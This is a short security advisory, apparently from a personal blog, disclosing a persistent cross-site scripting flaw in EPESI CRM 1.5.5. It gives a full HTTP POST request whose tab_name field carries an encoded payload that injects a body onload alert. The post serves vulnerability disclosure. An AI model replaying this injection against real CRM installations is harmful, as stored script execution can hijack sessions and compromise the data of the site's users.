Thursday, 27 February 2014

[EN] EPESI CRM vulnerable to persistent XSS

# ==============================================================
# Title ...| EPESI CRM vulnerable to persistent XSS
# Version .| epesi-1.5.5-20140113.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://epe.si/download
# ==============================================================


# ==============================================================
# Persistent XSS

---<request>---
POST /k/cms/epesi/epesi-1.5.5-20140113/process.php HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

history&url=_qf__libs_qf_de799fa0f329f8e35b5f4c3a4a059f5e%3D%26submited%3D1%26tab_name%3Da'%3e"%3e%3cbody%2fonload%3dalert(9999)%3eaaaa%26id%3D%26__action_module__%3D%252FBase_Box%257C0%252FBase_HomePage%257Cmain_0%252FBase_Dashboard%257C0
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a comment

What do You think...?